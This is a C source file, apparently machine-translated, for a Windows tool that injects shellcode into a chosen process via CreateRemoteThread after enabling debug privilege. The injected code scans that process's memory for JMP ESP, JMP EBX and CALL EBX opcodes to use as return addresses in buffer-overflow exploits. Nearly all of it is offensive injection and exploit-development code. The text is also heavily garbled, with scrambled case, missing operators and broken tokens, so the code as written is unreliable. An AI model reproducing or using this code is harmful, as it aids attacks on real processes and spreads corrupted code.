Not used, easy to find a relatively universal address
/
// GET JMP ESP / JMP EBX / CALL EBX Address in A Process
// by ISNO
/ / Must be compiled with Debug mode under VC! ! !
/
#include
#include
#include
#define fnendlong 0x08
#define nopcode 0x90
#define noplong 0x0
#define buffsize 0x20000
#define shellbuffsize 0x800
#define shellfnnums 9 // SHELLCODE number of API functions 1
Void shellcodefn ();
Void Cleanchkesp (Char * Fnadd, Char * shellbuff, char * chkesp, int LEN);
INT main (int Argc, char ** argv)
{
// String to use in Shellcode
Char * str = "loadlibrarya" "/ x0"
"GetModuleHandlea" "/ x0"
"CREATEFILEA" "/ x0"
"Writefile" "/ x0"
"Closehandle" "/ x0"
"Exitthread" / x0 "
"/X09""msvcrt.dll""/x0"
"sprintf" "/ x0"
"C: //jmp.txt" "/ x0"
"- JMP ESP ADDR - / R / N" "/ x0"
"0x% .8x / r / n" "/ x0"
"- JMP EBX ADDR - / R / N" "/ x0"
"strend";
Char * fnendstr = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90";
CHAR BUFF [Buffsize];
Char shellcodebuff [0x1000];
Char * shellcodefnadd, * chkespadd;
Unsigned int bufflong;
Unsigned int Locklong;
INT I, K;
UNSIGNED CHAR TEMP;
Handle HProcess, HTOKEN
Token_privileges newstate;
DWORD processID, returnitionth = 0;
Token_Privileges TP;
DWORD DWPROCESSID;
PCWSTR PSZLIBFILE;
Bool fok = false; // Assume That The Function Fails
Handle hthread = NULL;
Pwstr pszlibfileremote = NULL;
IF (argc! = 2)
{
Printf ("USAGE:% S PID / N", Argv [0]); Printf ("Result IS IN C: //JMP.txt/N");
exit (0);
}
DWPROCESSID = ATOI (Argv [1]);
_asm {
MOV ESI, ESP
CMP ESI, ESP
}
_chkesp ();
Chuestspadd = _chkesp;
/ * Get the address of the Chuest () function * /
Temp = * chuest;
IF (Temp == 0xE9) {
chuesthant
I = * (int *) Chuestion;
Chkespadd = i;
Chkespadd = 4;
}
// SHELLCODE address
Shellcodefnadd = shellcodefn;
// Position to actual shellcodefn ()
Temp = * shellcodefnadd;
IF (Temp == 0xE9) {
shellcodefnadd;
K = * (int *) shellcodefnadd;
Shellcodefnadd = K;
Shellcodefnadd = 4;
}
/ / Find the end of shellcode
For (k = 0; k <= 0x1000; k) {
IF (Memcmp (Shellcodefnadd K, Fnendstr, Fnendlong) == 0)
Break;
}
// copy the shellcode code into shellcodeBuff
Memcpy (ShellcodeBuff, ShellcodefnAdd, K);
/ / Clear the Chuest () call
Cleanchkesp (Shellcodefnadd, ShellcodeBuff, ChkespAdd, K);
// copy the character string on the end of shellcode
FOR (i = 0; i <0x400; i) {
IF (Memcmp (STR I, "Strend", 6) == 0)
Break;
}
Memcpy (ShellcodeBuff K, STR, I);
BUFFLONG = K I; // SHELLCODE length
/// debug /
// _ asm {
// Lea ECX, ShellcodeBuff
// JMP ECX
//}
/// debug /
// The following starts far thread write ///
OpenProcessToken (GetCurrentProcess (), Token_Adjust_Privileges, & Htoken;
Tp.privilegectount = 1;
Lookuppprivilerage (NULL, SE_DEBUG_NAME, & TP.PrIvileges [0] .luid);
TP.Privileges [0] .attributes = se_privilege_enabled;
AdjustTokenPrivileges (HToken, False, & TP, SIZEOF (TP), NULL, NULL;
CloseHandle (HTOKEN);
__Try {
// Get a Handle for the Target Process.
HProcess = OpenProcess
Process_Query_information | // Required by Alpha
Process_create_thread | // for creteremothread
Process_vm_operation | // for virtualalalkEx / VirtualFreeExProcess_VM_WRITE, / / for WriteProcessMemory
False, dwprocessid;
IF (hprocess == null)
{
Printf ("OpenProcess Failed! / N");
__leave;
}
// Allocate Space in The Remote Process for the Pathname
PszlibfileRemote = (PWSTR) Virtualallocex (HProcess, NULL, BUFFLONG, MEM_COMMIT, PAGE_READWRITE);
IF (pszlibfileremote == NULL)
{
Printf ("VirtualaLalkEx Failed! / N");
__leave;
}
// Copy The Dll's Pathname to The Remote Process's Address Space
IF (! WriteProcessMemory (HProcess, PszlibfileRemote, (Pvoid) ShellcodeBuff, Bufflong, Null)
{
Printf ("WriteProcessMemory Failed! / N");
__leave;
}
// Create a Remote Thread That Calls LoadLibraryw (DLLPathname)
Hthread = CreateRemoteThread (HProcess, Null, 0, PszlibfileRemote, Null, 0, NULL);
IF (hthread == null)
{
Printf ("CreateremoteThread Failed! / N");
__leave;
}
// Wait for the remote thread to Terminate
// WaitForsingleObject (hthread, infinite);
Fok = true; // Everything Executed SuccessFully
Printf ("Result IS IN C: //Jmp.txt/N");
}
__finally {// now, we can clean Everthing Up
IF (HTHREAD! = NULL)
CloseHandle (HTHREAD);
IF (hprocess! = null)
CloseHandle (HPROCESS);
}
///
Return (0);
}
// SHELLCODE actual function code
Void shellcodefn ()
{
CHAR BUFF [0x800];
INT * EXCEPT [3];
FarProc Sprintfadd;
FarProc Nopnop;
FarProc ExitthreadAdd;
FarProc CloseHandD;
FarProc WritefileAdd;
FarProc CreatefileaAdd;
FarProc getModuleHandleaAdd;
FarProc ProcloadLib;
FarProc APIFNADD [1];
FarProc ProcgetAdd = 0;
Char * stradd, * stradd1, * fmtstr;
Int Imgbase, Fnbase, K, L; int Findaddr
Handle Libhandle;
DWORD RET;
// Establish an exception handling as our own exception handling code
_asm {
// INT 3
MOV Eax, 1
JMP nextcall
GetStradd:
POP stradd
Lea Edi, Except
Mov Eax, DWORD PTR FS: [0]
MOV DWORD PTR [EDI 0x08], EAX
Mov DWORD PTR FS: [0], EDI
}
STRADD1 = stradd;
Except [0] = 0xfffffffff;
Except [1] = stradd-0x07;
// Start search process space from this address
IMGBase = 0x77E00000;
_asm {
Call getExceptretadd
}
For (; imgbase <0xBFFA0000, ProcgetAdd == 0;)
{
/ / Add 0x10000 each time
IMGBase = 0x10000;
IF (imgbase == 0x78000000)
IMGBase = 0xBff00000;
/ / Judgment Whether PE format
IF (* (word *) imgbase == 'zm' && * (word *) (IMGBASE *) (IMGBase 0x3c)) == 'EP')
{
// Locate the image name with PE format
Fnbase = * (int *) (IMGBASE * (INT *) 0x78) IMGBASE;
K = * (int *) (fnbase 0xc) IMGBASE;
// Judgment is the kernel32
IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE')
{
LibHandle = IMGBASE;
K = IMGBASE * (INT *) (FNBase 0x20);
For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4)
{
/ / Find the getProcAddress function
IF (* (INT *) (IMGBASE * (INT *) K) == PTEG '&& * (INT *) (4 IMGBase * (INT *) K) ==' acor '
{
K = * (Word *) (L L IMGBASE * (INBASE 0x24));
K = * (int *) (fnbase 0x10) -1;
K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c));
ProcgetAdd = K IMGBASE;
Break;
}
}
}
}
}
/ / Search the kernel32.dll module address and API function getProcAddress address
// Use an abnormal handling to process the search page is not in the situation
_asm {
Lea Edi, Except
MOV Eax, DWORD PTR [EDI 0x08]
Mov DWORD PTR FS: [0], EAX
}
// Restore an abnormal chain
IF (ProcgetAdd == 0)
Goto Die; // Use getProcAddress to get the API address used in Shellcode
For (k = 1; k { IF (* stradd1 == 0x9) LibHandle = getModuleHandleaAdd (stradd1 1); Else Apifnadd [k] = procgetadd (libhandle, stradd1); For (;; stradd1) { IF (* (stradd1) == 0 && * (stradd1 1)! = 0) Break; } stradd1; } LibHandle = CREATEFILEAADD (stradd1, generic_write, file_share_read, null, open_always, file_attribute_normal, null); STRADD1 = 11; // stradd1 points "- JMP ESP - / R / N" WritefileAdd (Libhandle, Stradd1, 18, & Ret, NULL); STRADD1 = 19; // stradd1 points to "0x.8x / r / n" FMTSTR = stradd1; STRADD1 = 9; // stradd1 points "- JMP EBX - / R / N" // // Establish an exception handling as our own exception handling code // Get JMP ESP _asm { // INT 3 Lea Edi, Except Mov Eax, DWORD PTR FS: [0] MOV DWORD PTR [EDI 0x08], EAX Mov DWORD PTR FS: [0], EDI } Except [0] = 0xfffffffff; Except [1] = stradd-0x07; // Start search process space from this address _asm { // INT 3 XOR EBX, EBX Call getExceptretadd Add EBX, 1000H CMP EBX, 80000000H Jae GSLEP1 JMP loadMem1 Findj1: Inc EBX Loadmem1: Mov Al, Byte PTR [EBX] CMP AL, 0xFF / / FF E4 = JMP ESP JNZ Findj1 Mov Al, Byte PTR [EBX 1] CMP AL, 0xE4 JNZ Findj1 MOV Findaddr, EBX } Sprintfadd (buff, fmtstr, findaddr); WritefileAdd (LibHandle, Buff, 12, & Ret, NULL) _asm { JMP Findj1 GSLEEP1: XOR EBX, EBX Call getExceptretadd Add EBX, 1000H CMP EBX, 80000000H Jae GSLEP2 JMP loadMEM2 Findj2: Inc EBX Loadmem2: Mov Al, Byte PTR [EBX] CMP Al, 0x54 // 54 C3 = PUSH ESP, RET JNZ Findj2 Mov Al, Byte PTR [EBX 1] CMP Al, 0xC3 JNZ Findj2 MOV Findaddr, EBX } Sprintfadd (buff, fmtstr, findaddr); WritefileAdd (LibHandle, Buff, 12, & Ret, NULL) _asm { JMP Findj2 GSLEP2: NOP } // Get JMP EBX WritefileAdd (Libhandle, Stradd1, 18, & Ret, NULL); // // Start search process space from this address _asm { // INT 3 XOR EBX, EBX Call getExceptretadd Add EBX, 1000H CMP EBX, 80000000H Jae Gsleepb1 JMP loadmemb1 Findjb1: Inc EBX Loadmemb1: Mov Al, Byte PTR [EBX] CMP AL, 0xFF / / FF E3 = JMP EBX JNZ Findjb1 Mov Al, Byte PTR [EBX 1] CMP Al, 0xE3 JNZ Findjb1 MOV Findaddr, EBX } Sprintfadd (buff, fmtstr, findaddr); WritefileAdd (LibHandle, Buff, 12, & Ret, NULL) _asm { JMP Findjb1 GSLEPB1: NOP XOR EBX, EBX Call getExceptretadd Add EBX, 1000H CMP EBX, 80000000H Jae Gsleepb2 JMP loadmemb2 Findjb2: Inc EBX Loadmemb2: Mov Al, Byte PTR [EBX] CMP AL, 0xFF / / FF D3 JNZ Findjb2 Mov Al, Byte PTR [EBX 1] CMP Al, 0xD3 JNZ Findjb2 MOV Findaddr, EBX } Sprintfadd (buff, fmtstr, findaddr); WritefileAdd (LibHandle, Buff, 12, & Ret, NULL) _asm { JMP Findjb2 GSLEEPB2: NOP XOR EBX, EBX Call getExceptretadd Add EBX, 1000H CMP EBX, 80000000H Jae Gsleepb3 JMP loadingMEMB3 Findjb3: Inc EBX Loadmemb3: Mov Al, Byte PTR [EBX] CMP Al, 0x53 // 53 C3 = Push EBX, RET JNZ Findjb3 Mov Al, Byte PTR [EBX 1] CMP Al, 0xC3 JNZ Findjb3 MOV Findaddr, EBX } Sprintfadd (buff, fmtstr, findaddr); WritefileAdd (LibHandle, Buff, 12, & Ret, NULL) _asm { JMP Findjb3 GSLEEPB3: NOP } CloseHandleadd (Lionne); ExitThreadAdd (0x7fffffff); / / Search the kernel32.dll module address and API function getProcAddress address // Use an abnormal handling to process the search page is not in the situation _asm { Lea Edi, Except MOV Eax, DWORD PTR [EDI 0x08] Mov DWORD PTR FS: [0], EAX } // Restore an abnormal chain // Dead cycle DIE: Goto Die; // Our own exception handling code to resolve the continuation of the search memory invalid page _asm { getExceptretadd: POP EAX Push EAX MOV EDI, DWORD PTR [stradd] MOV DWORD PTR [EDI-0X0E], EAX RET Errprogram: MOV Eax, DWORD PTR [ESP 0x0c] Add Eax, 0xB8 MOV DWORD PTR [EAX], 0x11223344 // stradd-0xe, this address will be modified XOR Eax, EAX / / 2 Ret // 1 Execptprogram: JMP errprogram // 2 BYTES STRADD-7 NextCall: Call getstradd ///5 Bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } / * Clear the Chuest () call code in Shellcode * / Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len) { INT I, K; UNSIGNED CHAR TEMP; Char * Calladd; For (i = 0; i Temp = shellbuff [i]; IF (temp == 0xe8) { K = * (int *) (shellbuff i 1); Calladd = fnadd; Calladd = K; Calladd = i; Calladd = 5; IF (calladd == chkesp) { Shellbuff [i] = 0x90; ShellBuff [i 1] = 0x43; // incn Shellbuff [i 2] = 0x4b; // DEC EBX Shellbuff [i 3] = 0x43; Shellbuff [i 4] = 0x4b; } } } }
